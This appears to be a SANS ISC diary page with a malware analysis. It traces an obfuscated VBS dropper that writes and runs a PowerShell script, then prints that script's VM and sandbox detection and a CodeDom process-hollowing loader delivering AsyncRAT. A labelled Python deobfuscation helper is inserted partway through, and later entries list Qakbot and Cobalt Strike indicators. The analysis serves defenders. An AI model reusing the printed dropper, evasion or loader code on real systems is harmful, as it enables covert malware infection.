            If i > lEn(Inp) \ 2 Then Exit For
            cptZahl = CByte("&" & "H" & Mid(Inp, i * 2 - 1, 2))
            orgZahl = cptZahl Xor keyZahl
            z = z & cHR(orgZahl)
        End If
    Next
    vQ = z
End Function

Dim AqUhNbgAqwpMb
AqUhNbgAqwpMb = "..." ' (hex-encoded payload removed)

' the arithmetic evaluates to "WsCRiPT.sHElL", i.e. WScript.Shell
Dim SH
SH = cHR(80 + 7) & cHR(100 + 15) & cHR(66 + 1) & cHR(80 + 2) & cHR(110 - 5) & cHR(85 - 5) & cHR(80 + 4) & cHR(40 + 6) & cHR(230 / 2) & cHR(36 * 2) & cHR(60 + 9) & cHR(100 + 8) & cHR(70 + 6)
Set WS = CreateObject(SH)
Set FSO = CreateObject("Scripting.FileSystemObject")
Set MyFile = FSO.CreateTextFile(FSO.GetSpecialFolder(2) + "\OS64Bits.PS1", True)
MyFile.WriteLine(rEPlAcE(vQ(AqUhNbgAqwpMb, "p2O)6[\.X0sI^{p(@5wAC|/Gh]N{am}3+(rNY3]>UK|/2_YlCUfqK{hZL*.NawX9G>:x.I", False), "%VBS%", wscript.SCRIPTFULLNAME))
MyFile.Close
WS.rUN "POWERSHELL -eXEcUTiONpOLicY rEmOtEsIgNeD -FILE " & FSO.GetSpecialFolder(2) + "\OS64Bits.PS1", 0

The payload is stored in AqUhNbgAqwpMb and decoded by vQ(). This function is an XOR decoder using a multi-byte key. The decoded payload is dropped on the filesystem (C:\Users\<user>\AppData\Local\Temp\OS64Bits.PS1) and executed by PowerShell. This script is interesting at multiple points.
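The two obfuscation tricks in that script, the hex/XOR routine vQ() and the cHR() arithmetic, ported to Python as an added analysis helper (not the diary's code) so an analyst can recover the dropped .PS1 and the object name without running the VBS. The key is the one from the sample; the hex payload is not on the page, so the test vectors are built with the encode branch of the same routine.

```python
import re

# Key string taken from the vQ() call in the sample above.
SAMPLE_KEY = r"p2O)6[\.X0sI^{p(@5wAC|/Gh]N{am}3+(rNY3]>UK|/2_YlCUfqK{hZL*.NawX9G>:x.I"

# The CreateObject argument as built in the sample.
SH_EXPRESSION = ('cHR(80 + 7) & cHR(100 + 15) & cHR(66 + 1) & cHR(80 + 2) & cHR(110 - 5) & '
                 'cHR(85 - 5) & cHR(80 + 4) & cHR(40 + 6) & cHR(230 / 2) & cHR(36 * 2) & '
                 'cHR(60 + 9) & cHR(100 + 8) & cHR(70 + 6)')


def vq_decode(hex_text, key):
    # Port of the Mode=False branch of vQ(): take the input two hex digits at a time,
    # XOR each byte with the current key character; the key position advances once per
    # output character and wraps back to the first character after Len(Key).
    out = bytearray()
    pos = 0
    for i in range(len(hex_text) // 2):
        pos = pos % len(key) + 1                       # Position = Position + 1, wrap to 1
        out.append(int(hex_text[2 * i:2 * i + 2], 16) ^ ord(key[pos - 1]))
    return out.decode("latin-1")


def vq_encode(text, key):
    # Port of the Mode=True branch; used here only to produce test vectors.
    out = []
    pos = 0
    for ch in text:
        pos = pos % len(key) + 1
        out.append("%02X" % (ord(ch) ^ ord(key[pos - 1])))
    return "".join(out)


CHR_TERM = re.compile(r"cHR\(\s*(\d+)\s*([-+*/])\s*(\d+)\s*\)", re.I)


def decode_chr_expression(expr):
    # Evaluate a VBScript string assembled from cHR(<int> <op> <int>) terms joined with '&'
    # by pattern matching, so nothing from the script is handed to an interpreter.
    ops = {"+": lambda a, b: a + b, "-": lambda a, b: a - b,
           "*": lambda a, b: a * b, "/": lambda a, b: a // b}   # all divisions here are exact
    return "".join(chr(ops[op](int(a), int(b))) for a, op, b in CHR_TERM.findall(expr))


if __name__ == "__main__":
    print(decode_chr_expression(SH_EXPRESSION))               # WsCRiPT.sHElL
    sample = "Write-Host %VBS%"                               # constructed stand-in payload
    encoded = vq_encode(sample, SAMPLE_KEY)
    print(encoded, "->", vq_decode(encoded, SAMPLE_KEY))
```

CreateObject is case-insensitive, so the recovered "WsCRiPT.sHElL" is simply WScript.Shell; the mixed case only defeats naive string matching.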

First, most suspicious strings are obfuscated and binary encoded. Decoding is performed via a specific function:

Function Binary2String([String] $data) {
    $byteList = [System.Collections.Generic.List[Byte]]::new()
    for ($i = 0; $i -lt $data.Length; $i += 8) {
        $byteList.Add([Convert]::ToByte($data.Substring($i, 8), 2))
    }
    return [System.Text.Encoding]::ASCII.GetString($byteList.ToArray())
}

There is a detection mechanism for virtual environments:

Function VirtualMachineDetector() {
    $searcher = (New-Object System.Management.ManagementObjectSearcher("Select * from Win32_ComputerSystem"))
    $items = $searcher.Get()
    $Tr = ""
    foreach ($item in $items) {
        [String] $manufacturer = $item["Manufacturer"].ToString().ToLower()
        if (($manufacturer -eq "microsoft corporation" -and
             $item["Model"].ToString().ToUpperInvariant().Contains("VIRTUAL")) -or
            $manufacturer.Contains("vmware") -or
            $item["Model"].ToString() -eq "VirtualBox") {
            $Tr = "True"
        } else {
            $Tr = "False"
        }
    }
    return $Tr
}

Note also the presence of a function to detect Sandboxie[2], another sandbox tool that is easy to spot by tracking the DLL SbieDll.dll:

Function DetectSandboxie() {
    [Int32] $i = ModuleHandle("SbieDll.dll")
    [String] $s = ""
    if ($i -eq 0) { $s = "False" } else { $s = "True" }
    return $s
}

The most interesting function is CodeDom. It invokes the CSharp compiler to compile the next payload:

function CodeDom([Byte[]] $BB, [String] $TP, [String] $MT) {
    $dictionary = new-object 'System.Collections.Generic.Dictionary[[string],[string]]'
    $dictionary.Add(("CompilerVersion"), ("v4.0"))
    $CsharpCompiler = New-Object Microsoft.CSharp.CSharpCodeProvider($dictionary)
    $CompilerParametres = New-Object System.CodeDom.Compiler.CompilerParameters
    $CompilerParametres.ReferencedAssemblies.Add(("System.dll"))
    $CompilerParametres.ReferencedAssemblies.Add(("System.Management.dll"))
    $CompilerParametres.ReferencedAssemblies.Add(("System.Windows.Forms.dll"))
    $CompilerParametres.ReferencedAssemblies.Add(("mscorlib.dll"))
    $CompilerParametres.ReferencedAssemblies.Add(("Microsoft.VisualBasic.dll"))
    $CompilerParametres.IncludeDebugInformation = $false
    $CompilerParametres.GenerateExecutable = $false
    $CompilerParametres.GenerateInMemory = $true
    $CompilerParametres.CompilerOptions += ("/platform:X86 /unsafe /target:library")
    $BB = Decompress($BB)
    [System.CodeDom.Compiler.CompilerResults] $CompilerResults =
        $CsharpCompiler.CompileAssemblyFromSource($CompilerParametres,
            [System.Text.Encoding]::Default.GetString($BB))
    [Type] $T = $CompilerResults.CompiledAssembly.GetType($TP)
    [Byte[]] $Bytes = Decompress(@(
        31,139,8,0,0,0,0,0,4,0,180,189,7,124,92,213,149,63,126,231,77,213,168,206,168,203,18,150,139,204,216,
        198,178,138,37,75,6,131,213,45,219,178,213,108,75,14,193,140,164,145,52,246,72,79,158,25,201,150,13,
        142,197,2,129,36,180,116,88,146,80,194,166,146,132,36,155,182,41,56,
        (bytes removed)
        61,237,1,92,113,253,243,0,180,0,0))
    try {
        [String] $MyPt =
            [System.IO.Path]::Combine([System.Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory(),
                "InstallUtil.exe")
        [Object[]] $Params = @($MyPt.Replace("Framework64","Framework"), $Bytes)
        return $T.GetMethod($MT).Invoke($null, $Params)
    } catch { }
}

The CSharp code is located in the variable BB (I posted the code on Pastebin[3]). By having a look at the code, we can see a bunch of interesting API calls:

private static readonly DelegateVirtualAllocEx VirtualAllocEx =
    LoadApi<DelegateVirtualAllocEx>(ReverseString(Kernel32), ReverseString(VirtualAllcEx));
private static readonly DelegateWriteProcessMemory WriteProcessMemory =
    LoadApi<DelegateWriteProcessMemory>(ReverseString(Kernel32), ReverseString(WriteProcessMem));
private static readonly DelegateReadProcessMemory ReadProcessMemory =
    LoadApi<DelegateReadProcessMemory>(ReverseString(Kernel32), ReverseString(ReadProcessMem));
private static readonly DelegateZwUnmapViewOfSection ZwUnmapViewOfSection =
    LoadApi<DelegateZwUnmapViewOfSection>(ReverseString(ntdll), ReverseString(ZwUnmapViewOfSec));
private static readonly DelegateCreateProcessA CreateProcessA =
    LoadApi<DelegateCreateProcessA>(ReverseString(Kernel32), ReverseString(CreateProcA));

This clearly indicates that process hollowing is used to replace the code of a legit process with malicious code. This code is located in the variable Bytes and is a PE file (SHA256:D452CEE94E3A2D58B05E9F62A4AA4004C0632D9B56FA8B57664D295BC88C4DF0) that tries to communicate with a C2 server located at asin8989.ddns.net on port 8989. The malware belongs to the AsyncRat[4] family. 

Note: My advice to protect yourself against such malicious .vbs files is to replace the default app used to open them with notepad.exe.

[1] https://www.virustotal.com/gui/file/8697dc74d7c07583f24488926fc6e117975f8a9f014972073d19a5e62d248ead/detection
[2] https://github.com/sandboxie-plus/sandboxie
[3] https://pastebin.com/cW25WEpY
[4] https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

4 March 2021

ISC Stormcast For Thursday, March 4th, 2021 https://isc.sans.edu/podcastdetail.html?id=7398, (Thu, Mar 4th)

3 March 2021

ISC Stormcast For Wednesday, March 3rd, 2021 https://isc.sans.edu/podcastdetail.html?id=7396, (Wed, Mar 3rd)

3 March 2021

Qakbot infection with Cobalt Strike, (Wed, Mar 3rd)

Introduction

On Tuesday 2021-03-02, I generated a Qakbot (Qbot) infection on a Windows host in one of my Active Directory (AD) test environments, where I saw Cobalt Strike as follow-up activity.  I've seen Cobalt Strike from Qakbot infections before.  Below are two that I documented in December 2020.

I haven't documented one for the ISC yet, so today's diary reviews my Qakbot infection with Cobalt Strike seen on Tuesday 2021-03-02.


Shown above:  Flow chart for the Qakbot infection with Cobalt Strike from Tuesday 2021-03-02.

Images


Shown above:  Spreadsheet extracted from a zip archive attached to malspam pushing Qakbot.


Shown above:  Traffic from the infection filtered in Wireshark (image 1 of 3).


Shown above:  Traffic from the infection filtered in Wireshark (image 2 of 3).


Shown above:  Traffic from the infection filtered in Wireshark (image 3 of 3).


Shown above:  Initial DLL saved on the victim's Windows host.


Shown above:  Artifact saved to disk during the Qakbot infection.


Shown above:  Registry updates caused by Qakbot.

Indicators of Compromise (IOCs)

Malware from the infected Windows host:

SHA256 hash: 16a0c2f741a14c423b7abe293e26f711fdb984fc52064982d874bf310c520b12

SHA256 hash: 24753d9f0d691b6d582da3e301b98f75abbdb5382bb871ee00713c5029c56d44

Traffic to retrieve the initial Qakbot DLL:

  • 8.209.64[.]96 port 80 - kfzhm28pwzrlk02bmjy[.]com - GET /mrch.gif

Qakbot C2 traffic:

  • 207.246.77[.]75 port 995 - HTTPS traffic

Cobalt Strike traffic:

  • 45.144.29[.]185 port 443 - HTTPS traffic
  • 45.144.29[.]185 port 443 - logon.securewindows[.]xyz - HTTPS traffic
  • 45.144.29[.]185 port 8080 - 45.144.29[.]185:8080 - GET /WjSH
  • 45.144.29[.]185 port 8080 - logon.securewindows[.]xyz:8080 - GET /cx
  • 45.144.29[.]185 port 8080 - 45.144.29[.]185:8080 - GET /en_US/all.js
  • 45.144.29[.]185 port 8080 - 45.144.29[.]185:8080 - POST /submit.php?id=248927919

Final words

A pcap of the infection traffic and the associated malware can be found here.

---

Brad Duncan
brad [at] malware-traffic-analysis.net

3 March 2021

Patch Now: HAFNIUM targeting Exchange Servers with 0day exploits https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/, (Tue, Mar 2nd)
